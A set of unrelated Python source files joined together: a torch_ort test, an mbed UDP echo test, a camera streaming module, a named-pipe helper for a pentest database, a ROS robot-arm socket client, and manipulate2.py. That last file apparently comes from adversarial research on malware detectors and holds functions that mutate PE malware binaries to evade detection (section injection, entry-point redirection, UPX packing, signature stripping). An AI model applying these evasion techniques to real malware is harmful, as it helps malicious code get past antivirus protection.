assert "My EP provider created, with device id: 0, some_option: val" not in out.capturedtext
# test clear training ep instance pool
torch_ort.clear_training_ep_instances()
with OutputGrabber() as out:
torch_ort.set_device(3, "TestExecutionProvider", {"device_id": "0", "some_config": "val"})
ort_device = torch_ort.device(1)
assert "My EP provider created, with device id: 0, some_option: val" in out.capturedtext
def test_print(self):
x = torch.ones(1, 2)
ort_x = x.to("ort")
with OutputGrabber() as out:
print(ort_x)
assert "tensor([[1., 1.]], device='ort:0')" in out.capturedtext
if __name__ == "__main__":
unittest.main()
|
udp_echo_client.py
|
"""
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
import socket
from sys import stdout
from threading import Thread
from SocketServer import BaseRequestHandler, UDPServer
from mbed_host_tests import BaseHostTest, event_callback
class UDPEchoClientHandler(BaseRequestHandler):
def handle(self):
""" UDP packet handler. Echoes data back to sender's address.
"""
data, sock = self.request
print ('HOST: UDPEchoClientHandler: Rx: \n%s\n' % data)
sock.sendto(data, self.client_address)
class UDPEchoClientTest(BaseHostTest):
def __init__(self):
"""
Initialise test parameters.
:return:
"""
BaseHostTest.__init__(self)
self.SERVER_IP = None # Will be determined after knowing the target IP
self.SERVER_PORT = 0 # Let TCPServer choose an arbitrary port
self.server = None
self.server_thread = None
self.target_ip = None
@staticmethod
def find_interface_to_target_addr(target_ip):
"""
Finds IP address of the interface through which it is connected to the target.
:return:
"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((target_ip, 0)) # Target IP, Any port
ip = s.getsockname()[0]
s.close()
return ip
def setup_udp_server(self):
"""
sets up a UDP server for target to connect and send test data.
:return:
"""
# !NOTE: There should mechanism to assert in the host test
if self.SERVER_IP is None:
self.log("setup_udp_server() called before determining server IP!")
self.notify_complete(False)
# Returning none will suppress host test from printing success code
self.server = UDPServer((self.SERVER_IP, self.SERVER_PORT), UDPEchoClientHandler)
ip, port = self.server.server_address
self.SERVER_PORT = port
self.server.allow_reuse_address = True
self.log("HOST: Listening for UDP packets: " + self.SERVER_IP + ":" + str(self.SERVER_PORT))
self.server_thread = Thread(target=UDPEchoClientTest.server_thread_func, args=(self,))
self.server_thread.start()
@staticmethod
def server_thread_func(this):
"""
Thread function to run TCP server forever.
:param this:
:return:
"""
this.server.serve_forever()
@event_callback("target_ip")
def _callback_target_ip(self, key, value, timestamp):
"""
Callback to handle reception of target's IP address.
:param key:
:param value:
:param timestamp:
:return:
"""
self.target_ip = value
self.SERVER_IP = self.find_interface_to_target_addr(self.target_ip)
self.setup_udp_server()
@event_callback("host_ip")
def _callback_host_ip(self, key, value, timestamp):
"""
Callback for request for host IP Addr
"""
self.send_kv("host_ip", self.SERVER_IP)
@event_callback("host_port")
def _callback_host_port(self, key, value, timestamp):
"""
Callback for request for host port
"""
self.send_kv("host_port", self.SERVER_PORT)
def teardown(self):
if self.server:
self.server.shutdown()
self.server_thread.join()
|
manipulate2.py
|
# TODO:
# * modify exports using lief
# * zero out rich header (if it exists) --> requires updating OptionalHeader's checksum ("Rich Header" only in Microsoft-produced executables)
# * tinker with resources: https://lief.quarkslab.com/doc/tutorials/07_pe_resource.html
import lief # pip install https://github.com/lief-project/LIEF/releases/download/0.7.0/linux_lief-0.7.0_py3.6.tar.gz
import json
import os
import sys
import array
import struct # byte manipulations
import random
import tempfile
import subprocess
import functools
import signal
import multiprocessing
module_path = os.path.split(os.path.abspath(sys.modules[__name__].__file__))[0]
COMMON_SECTION_NAMES = open(os.path.join(
module_path, 'section_names.txt'), 'r').read().rstrip().split('\n')
COMMON_IMPORTS = json.load(
open(os.path.join(module_path, 'small_dll_imports.json'), 'r'))
class MalwareManipulator(object):
def __init__(self, bytez):
self.bytez = bytez
self.min_append_log2 = 5
self.max_append_log2 = 8
def __random_length(self):
return 2**random.randint(self.min_append_log2, self.max_append_log2)
def __binary_to_bytez(self, binary, dos_stub=False, imports=False, overlay=False, relocations=False, resources=False, tls=False):
# write the file back as bytez
builder = lief.PE.Builder(binary)
if(dos_stub):
builder.build_dos_stub(dos_stub) # rebuild DOS stub
if(imports):
builder.build_imports(imports) # rebuild IAT in another section
builder.patch_imports(imports) # patch original import table with trampolines to new import table
if(overlay):
builder.build_overlay(overlay) # rebuild overlay
if(relocations):
builder.build_relocations(relocations) # rebuild relocation table in another section
if(resources):
builder.build_resources(resources) # rebuild resources in another section
if(tls):
builder.build_tls(tls) # rebuilt TLS object in another section
builder.build() # perform the build process
# there seems to be a difference when builder does a write as compare to get_build
import time
tmpfile = str(hash(time.time()))
builder.write(tmpfile)
with open(tmpfile, "rb") as binfile:
binary = binfile.read()
os.remove(tmpfile)
return binary
# section_* would have no change since none of the flags are true with the following return
# return array.array('B', builder.get_build()).tobytes()
def overlay_append(self, seed=None):
random.seed(seed)
L = self.__random_length()
# choose the upper bound for a uniform distribution in [0,upper]
upper = random.randrange(256)
# upper chooses the upper bound on uniform distribution:
# upper=0 would append with all 0s
# upper=126 would append with "printable ascii"
# upper=255 would append with any character
return self.bytez + bytes([random.randint(0, upper) for _ in range(L)])
def imports_append(self, seed=None):
# add (unused) imports
random.seed(seed)
binary = lief.PE.parse(self.bytez, name='')
# draw a library at random
libname = random.choice(list(COMMON_IMPORTS.keys()))
funcname = random.choice(list(COMMON_IMPORTS[libname]))
lowerlibname = libname.lower()
# find this lib in the imports, if it exists
lib = None
for im in binary.imports:
if im.name.lower() == lowerlibname:
lib = im
break
if lib is None:
# add a new library
lib = binary.add_library(libname)
# get current names
names = set([e.name for e in lib.entries])
if not funcname in names:
lib.add_entry(funcname)
self.bytez = self.__binary_to_bytez(binary,imports=True)
return self.bytez
# def exports_append(self,seed=None):
# TODO: when LIEF has a way to create this
# random.seed(seed)
# binary = lief.PE.parse( self.bytez )
# if not binary.has_exports:
# return self.bytez
# # TO DO: add a lief.PE.DATA_DIRECTORY.EXPORT_TABLE to the data directory
# # find the data directory
# for i,e in enumerate(binary.data_directories):
# if e.type == lief.PE.DATA_DIRECTORY.EXPORT_TABLE:
# break
# def exports_reorder(self,seed=None):
# # reorder exports
# pass
def section_rename(self, seed=None):
# rename a random section
random.seed(seed)
binary = lief.PE.parse(self.bytez, name="")
targeted_section = random.choice(binary.sections)
targeted_section.name = random.choice(COMMON_SECTION_NAMES)[:7] # current version of lief not allowing 8 chars?
self.bytez = self.__binary_to_bytez(binary)
return self.bytez
def section_add(self, seed=None):
random.seed(seed)
binary = lief.PE.parse(self.bytez, name="")
new_section = lief.PE.Section(
"".join(chr(random.randrange(ord('.'), ord('z'))) for _ in range(6)))
# fill with random content
upper = random.randrange(256)
L = self.__random_length()
new_section.content = [random.randint(0, upper) for _ in range(L)]
new_section.virtual_address = max(
[s.virtual_address + s.size for s in binary.sections])
# add a new empty section
binary.add_section(new_section,
random.choice([
lief.PE.SECTION_TYPES.BSS,
lief.PE.SECTION_TYPES.DATA,
lief.PE.SECTION_TYPES.EXPORT,
lief.PE.SECTION_TYPES.IDATA,
lief.PE.SECTION_TYPES.RELOCATION,
lief.PE.SECTION_TYPES.RESOURCE,
lief.PE.SECTION_TYPES.TEXT,
lief.PE.SECTION_TYPES.TLS_,
lief.PE.SECTION_TYPES.UNKNOWN,
]))
self.bytez = self.__binary_to_bytez(binary)
return self.bytez
def section_append(self, seed=None):
# append to a section (changes size and entropy)
random.seed(seed)
binary = lief.PE.parse(self.bytez, name="")
targeted_section = random.choice(binary.sections)
L = self.__random_length()
available_size = targeted_section.size - len(targeted_section.content)
if L > available_size:
L = available_size
upper = random.randrange(256)
targeted_section.content = targeted_section.content + \
[random.randint(0, upper) for _ in range(L)]
self.bytez = self.__binary_to_bytez(binary)
return self.bytez
# def section_reorder(self,param,seed=None):
# # reorder directory of sections
# pass
def create_new_entry(self, seed=None):
# create a new section with jump to old entry point, and change entry point
# DRAFT: this may have a few technical issues with it (not accounting for relocations), but is a proof of concept for functionality
random.seed(seed)
binary = lief.PE.parse(self.bytez, name="")
# get entry point
entry_point = binary.optional_header.addressof_entrypoint
# get name of section
entryname = binary.section_from_rva(entry_point).name
# create a new section
new_section = lief.PE.Section(entryname + "".join(chr(random.randrange(
ord('.'), ord('z'))) for _ in range(3))) # e.g., ".text" + 3 random characters
# push [old_entry_point]; ret
new_section.content = [
0x68] + list(struct.pack("<I", entry_point + 0x10000)) + [0xc3]
new_section.virtual_address = max(
[s.virtual_address + s.size for s in binary.sections])
# TO DO: account for base relocation (this is just a proof of concepts)
# add new section
binary.add_section(new_section, lief.PE.SECTION_TYPES.TEXT)
# redirect entry point
binary.optional_header.addressof_entrypoint = new_section.virtual_address
self.bytez = self.__binary_to_bytez(binary)
return self.bytez
def upx_pack(self, seed=None):
# tested with UPX 3.91
random.seed(seed)
tmpfilename = os.path.join(
tempfile._get_default_tempdir(), next(tempfile._get_candidate_names()))
# dump bytez to a temporary file
with open(tmpfilename, 'wb') as outfile:
outfile.write(self.bytez)
options = ['--force', '--overlay=copy']
compression_level = random.randint(1, 9)
options += ['-{}'.format(compression_level)]
# --exact
# compression levels -1 to -9
# --overlay=copy [default]
# optional things:
# --compress-exports=0/1
# --compress-icons=0/1/2/3
# --compress-resources=0/1
# --strip-relocs=0/1
options += ['--compress-exports={}'.format(random.randint(0, 1))]
options += ['--compress-icons={}'.format(random.randint(0, 3))]
options += ['--compress-resources={}'.format(random.randint(0, 1))]
options += ['--strip-relocs={}'.format(random.randint(0, 1))]
with open(os.devnull, 'w') as DEVNULL:
retcode = subprocess.call(
['upx'] + options + [tmpfilename, '-o', tmpfilename + '_packed'], stdout=DEVNULL, stderr=DEVNULL)
os.unlink(tmpfilename)
if retcode == 0: # successfully packed
with open(tmpfilename + '_packed', 'rb') as infile:
self.bytez = infile.read()
os.unlink(tmpfilename + '_packed')
return self.bytez
def upx_unpack(self, seed=None):
# dump bytez to a temporary file
tmpfilename = os.path.join(
tempfile._get_default_tempdir(), next(tempfile._get_candidate_names()))
with open(tmpfilename, 'wb') as outfile:
outfile.write(self.bytez)
with open(os.devnull, 'w') as DEVNULL:
retcode = subprocess.call(
['upx', tmpfilename, '-d', '-o', tmpfilename + '_unpacked'], stdout=DEVNULL, stderr=DEVNULL)
os.unlink(tmpfilename)
if retcode == 0: # sucessfully unpacked
with open(tmpfilename + '_unpacked', 'rb') as result:
self.bytez = result.read()
os.unlink(tmpfilename + '_unpacked')
return self.bytez
def remove_signature(self, seed=None):
random.seed(seed)
binary = lief.PE.parse(self.bytez, name="")
if binary.has_signature:
for i, e in enumerate(binary.data_directories):
if e.type == lief.PE.DATA_DIRECTORY.CERTIFICATE_TABLE:
break
if e.type == lief.PE.DATA_DIRECTORY.CERTIFICATE_TABLE:
# remove signature from certificate table
e.rva = 0
e.size = 0
self.bytez = self.__binary_to_bytez(binary)
return self.bytez
# if no signature found, self.bytez is unmodified
return self.bytez
def remove_debug(self, seed=None):
random.seed(seed)
binary = lief.PE.parse(self.bytez, name="")
if binary.has_debug:
for i, e in enumerate(binary.data_directories):
if e.type == lief.PE.DATA_DIRECTORY.DEBUG:
break
if e.type == lief.PE.DATA_DIRECTORY.DEBUG:
# remove signature from certificate table
e.rva = 0
e.size = 0
self.bytez = self.__binary_to_bytez(binary)
return self.bytez
# if no signature found, self.bytez is unmodified
return self.bytez
def break_optional_header_checksum(self, seed=None):
binary = lief.PE.parse(self.bytez, name="")
binary.optional_header.checksum = 0
self.bytez = self.__binary_to_bytez(binary)
return self.bytez
##############################
def identity(bytez, seed=None):
return bytez
######################
# explicitly list so that these may be used externally
ACTION_TABLE = {
# 'do_nothing': identity,
'overlay_append': 'overlay_append',
'imports_append': 'imports_append',
'section_rename': 'section_rename',
'section_add': 'section_add',
'section_append': 'section_append',
'create_new_entry': 'create_new_entry',
'remove_signature': 'remove_signature',
'remove_debug': 'remove_debug',
'upx_pack': 'upx_pack',
'upx_unpack': 'upx_unpack',
'break_optional_header_checksum': 'break_optional_header_checksum',
# 'modify_exports' : modify_exports,
}
def modify_without_breaking(bytez, actions=[], seed=None):
for action in actions:
_action = ACTION_TABLE[action]
# we run manipulation in a child process to shelter
# our malware model from rare parsing errors in LIEF that
# may segfault or timeout
def helper(_action,shared_list):
# TODO: LIEF is chatty. redirect stdout and stderr to /dev/null
# for this process, change segfault of the child process
# to a RuntimeEror
def sig_handler(signum, frame):
raise RuntimeError
signal.signal(signal.SIGSEGV, sig_handler)
bytez = array.array('B', shared_list[:]).tobytes()
# TODO: LIEF is chatty. redirect output to /dev/null
if type(_action) is str:
_action = MalwareManipulator(bytez).__getattribute__(_action)
else:
_action = functools.partial( _action, bytez )
# redirect standard out only in this queue
try:
shared_list[:] = _action(seed)
except (RuntimeError,UnicodeDecodeError,TypeError,lief.not_found) as e:
# some exceptions that have yet to be handled by public release of LIEF
print("==== exception in child process ===")
print(e)
# shared_bytez remains unchanged
# communicate with the subprocess through a shared list
# can't use multiprocessing.Array since the subprocess may need to
# change the size
manager = multiprocessing.Manager()
shared_list = manager.list()
shared_list[:] = bytez # copy bytez to shared array
# define process
p = multiprocessing.Process( target=helper, args=(_action,shared_list) )
p.start() # start the process
try:
p.join(5) # allow this to take up to 5 seconds...
except multiprocessing.TimeoutError: # ..then become petulant
print('==== timeouterror ')
p.terminate()
bytez = array.array('B', shared_list[:]).tobytes() # copy result from child process
import hashlib
m = hashlib.sha256()
m.update( bytez )
print("new hash: {}".format(m.hexdigest()))
return bytez
def test(bytez):
binary = lief.PE.parse(bytez)
#print('overlay_append')
#manip = MalwareManipulator(bytez)
#bytez2 = manip.overlay_append(bytez)
#binary2 = lief.PE.parse(bytez2)
#assert len(binary.overlay) != len(binary2.overlay), "modification failed"
# SUCCEEDS, but note that lief builder also adds a new ".l1" section for each patch of the imports
print('imports_append')
manip = MalwareManipulator(bytez)
bytez2 = manip.imports_append(bytez)
binary2 = lief.PE.parse(bytez2, name='')
set1 = set(binary.imported_functions)
set2 = set(binary2.imported_functions)
diff = set2.difference(set1)
print(list(diff))
assert len(binary.imported_functions) != len(binary2.imported_functions), "no new imported functions"
# SUCCEEDS
print('section_rename')
manip = MalwareManipulator(bytez)
bytez2 = manip.section_rename(bytez)
binary2 = lief.PE.parse(bytez2, name='')
oldsections = [s.name for s in binary.sections]
newsections = [s.name for s in binary2.sections]
print(oldsections)
print(newsections)
assert " ".join(newsections) != " ".join(oldsections), "no modified sections"
print('section_add')
manip = MalwareManipulator(bytez)
bytez2 = manip.section_add(bytez)
binary2 = lief.PE.parse(bytez2, name='')
oldsections = [s.name for s in binary.sections]
newsections = [s.name for s in binary2.sections]
print(oldsections)
print(newsections)
assert len(newsections) != len(oldsections), "no new sections"
# FAILS if there's insufficient room to add to the section
print('section_append')
manip = MalwareManipulator(bytez)
bytez2 = manip.section_append(bytez)
binary2 = lief.PE.parse(bytez2, name='')
oldsections = [len(s.content) for s in binary.sections]
newsections = [len(s.content) for s in binary2.sections]
print(oldsections)
print(newsections)
assert sum(newsections) != sum(oldsections), "no appended section"
print('create_new_entry') # note: also adds a new section
manip = MalwareManipulator(bytez)
bytez2 = manip.create_new_entry(bytez)
binary2 = lief.PE.parse(bytez2, name='')
print(binary.entrypoint)
print(binary2.entrypoint)
assert binary.entrypoint != binary2.entrypoint, "no new entry point"
print('remove_signature')
manip = MalwareManipulator(bytez)
bytez2 = manip.remove_signature(bytez)
binary2 = lief.PE.parse(bytez2, name='')
if binary.has_signature:
assert binary2.has_signature == False, "failed to remove signature"
print('remove_debug')
manip = MalwareManipulator(bytez)
bytez2 = manip.remove_debug(bytez)
binary2 = lief.PE.parse(bytez2, name='')
if binary.has_debug:
assert binary2.has_debug == False, "failed to remove debug"
print('break_optional_header_checksum')
manip = MalwareManipulator(bytez)
bytez2 = manip.break_optional_header_checksum(bytez)
binary2 = lief.PE.parse(bytez2, name='')
assert binary2.optional_header.checksum == 0, "checksum not zero :("
|
aps_video.py
|
# aps_video.py
#
# Copyright (c) 2022 John Fritz
# MIT License, see license.md for full license text
from imutils.video import VideoStream
import threading
import time
import datetime
import os
os.environ["OPENCV_IO_MAX_IMAGE_PIXELS"] = str(2 ** 64)
import cv2
import collections
import numpy as np
from timelapse import Timelapse
from utils import *
class ApsVideo:
def __init__(self):
# source: 2 for pi camera, 0 for usb webcam. Must have fswebcam installed on host machine
self.vs_started = True
self.frame_lock = threading.Lock()
self.frame_queue = Queue(max_size=10)
# Init video stream
self.frame_width_px = 960
self.frame_height_px = 720
self.resolution = (self.frame_width_px, self.frame_height_px)
# USB Camera
self.vs_usb = VideoStream(src=0, resolution=self.resolution).start()
# Sleep to allow camera to warm up
time.sleep(2)
# Pi Camera
self.vs_pi = VideoStream(
src=2, usePiCamera=True, resolution=self.resolution
).start()
# Sleep to allow camera to warm up
time.sleep(2)
# Init timelapse object
self.timelapse = Timelapse()
# Start thread to generate frames
generate_frame_thread = threading.Thread(target=self.generate_frame)
generate_frame_thread.daemon = True
generate_frame_thread.start()
def get_screenshot(self):
frame = None
with self.frame_lock:
# Pull latest image out of frame queue, return it, and put it back in frame queue
frame = self.frame_queue.dequeue()
self.frame_queue.enqueue(frame)
return frame
def _merge_frames(self, frame1, frame2):
frame1 = frame1[:, :, :3]
frame1_x, _ = frame1.shape[:2]
frame2 = frame2[:, :, :3]
x, y = frame2.shape[0:2]
new_frame = cv2.resize(frame2, (int(y * float(frame1_x) / x), frame1_x))
new_frame = np.hstack((new_frame, frame1))
return new_frame
def generate_frame(self):
timelapseDelay = 30 # Seconds
lastUpdatedTime = 0
pi_frame = None
usb_frame = None
frame = None
frame_updated = False
while True:
# Delay to limit framerate
# time.sleep(0.05)
with self.frame_lock:
# Get frame from camera
pi_frame = self.vs_pi.read()
usb_frame = self.vs_usb.read()
if (pi_frame is not None) and (usb_frame is not None):
frame = self._merge_frames(pi_frame, usb_frame)
# Write timestamp on top of frame
timestamp = datetime.datetime.now()
cv2.putText(
frame,
timestamp.strftime("%a %d %b %Y %H:%M:%S"),
(10, frame.shape[0] - 10),
cv2.FONT_HERSHEY_SIMPLEX,
0.7,
(0, 0, 0),
4,
)
cv2.putText(
frame,
timestamp.strftime("%a %d %b %Y %H:%M:%S"),
(10, frame.shape[0] - 10),
cv2.FONT_HERSHEY_SIMPLEX,
0.7,
(255, 255, 255),
2,
)
# Insert frame into frame queue
self.frame_queue.enqueue(frame)
frame_updated = True
# print('Enqueued frame, current count is {} frames'.format(len(self.frame_queue._queue)))
if frame_updated:
# Save frame for timelapse
if time.time() > (lastUpdatedTime + timelapseDelay):
self.timelapse.save_frame(frame)
lastUpdatedTime = time.time()
def encode_frame(self):
frame_updated = False
last_encoded_image = None
while True:
time.sleep(0.05)
with self.frame_lock:
try:
frame = self.frame_queue.dequeue()
frame_updated = True
# print('Dequeued frame, current count is {} frames'.format(len(self.frame_queue._queue)))
except:
frame_updated = False
print("No data in frame_queue")
if frame_updated:
encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 90]
# encode the frame in JPEG format
(flag, encoded_image) = cv2.imencode(".jpg", frame, encode_param)
# ensure the frame was successfully encoded
if not flag:
continue
# Copy new encoded image to last encoded image
last_encoded_image = encoded_image
# yield the output frame in the byte format
if last_encoded_image is not None:
yield (
b"--frame\r\n"
b"Content-Type: image/jpeg\r\n\r\n"
+ bytearray(last_encoded_image)
+ b"\r\n"
)
else:
continue
def stop(self):
# Release video stream pointers
cv2.destroyAllWindows()
self.vs_pi.stop()
self.vs_usb.stop()
|
named_pipes.py
|
#!/usr/bin/env python3
import configparser
import multiprocessing
import os
from jackal import HostSearch, RangeSearch, ServiceSearch, UserSearch
from jackal.config import Config
from jackal.utils import print_error, print_notification, print_success
from jackal.utils import PartialFormatter
fmt = PartialFormatter(missing='')
def pipe_worker(pipename, filename, object_type, query, format_string, unique=False):
"""
Starts the loop to provide the data from jackal.
"""
print_notification("[{}] Starting pipe".format(pipename))
object_type = object_type()
try:
while True:
uniq = set()
# Remove the previous file if it exists
if os.path.exists(filename):
os.remove(filename)
# Create the named pipe
os.mkfifo(filename)
# This function will block until a process opens it
with open(filename, 'w') as pipe:
print_success("[{}] Providing data".format(pipename))
# Search the database
objects = object_type.search(**query)
for obj in objects:
data = fmt.format(format_string, **obj.to_dict())
if unique:
if not data in uniq:
uniq.add(data)
pipe.write(data + '\n')
else:
pipe.write(data + '\n')
os.unlink(filename)
except KeyboardInterrupt:
print_notification("[{}] Shutting down named pipe".format(pipename))
except Exception as e:
print_error("[{}] Error: {}, stopping named pipe".format(e, pipename))
finally:
os.remove(filename)
def create_query(section):
"""
Creates a search query based on the section of the config file.
"""
query = {}
if 'ports' in section:
query['ports'] = [section['ports']]
if 'up' in section:
query['up'] = bool(section['up'])
if 'search' in section:
query['search'] = [section['search']]
if 'tags' in section:
query['tags'] = [section['tags']]
if 'groups' in section:
query['groups'] = [section['groups']]
return query
def create_pipe_workers(configfile, directory):
"""
Creates the workers based on the given configfile to provide named pipes in the directory.
"""
type_map = {'service': ServiceSearch,
'host': HostSearch, 'range': RangeSearch,
'user': UserSearch}
config = configparser.ConfigParser()
config.read(configfile)
if not len(config.sections()):
print_error("No named pipes configured")
return
print_notification("Starting {} pipes in directory {}".format(
len(config.sections()), directory))
workers = []
for name in config.sections():
section = config[name]
query = create_query(section)
object_type = type_map[section['type']]
args = (name, os.path.join(directory, name), object_type, query,
section['format'], bool(section.get('unique', 0)))
workers.append(multiprocessing.Process(target=pipe_worker, args=args))
return workers
def main():
"""
Loads the config and handles the workers.
"""
config = Config()
pipes_dir = config.get('pipes', 'directory')
pipes_config = config.get('pipes', 'config_file')
pipes_config_path = os.path.join(config.config_dir, pipes_config)
if not os.path.exists(pipes_config_path):
print_error("Please configure the named pipes first")
return
workers = create_pipe_workers(pipes_config_path, pipes_dir)
if workers:
for worker in workers:
worker.start()
try:
for worker in workers:
worker.join()
except KeyboardInterrupt:
print_notification("Shutting down")
for worker in workers:
worker.terminate()
worker.join()
if __name__ == '__main__':
main()
|
Hiwin_RT605_ArmCommand_Socket_20190627170600.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
pos_feedback_times = 0
mode_feedback_times = 0
msg_feedback = 1
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = speedmode
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
# rospy.loginfo(state)
pub.publish(state)
rate.sleep()
# a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
# s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
# b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
#print ("Ready to connect")
#rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global arm_mode_flag,speed_mode_flag,point_data_flag
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
# Arm_feedback = 0
# socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
# Arm_feedback = 1
# socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
# Arm_feedback = 6
# socket_client_arm_state(Arm_feedback)
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
# Socket_sent_flag = False
# socket_client_sent_flag(Socket_sent_flag)
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
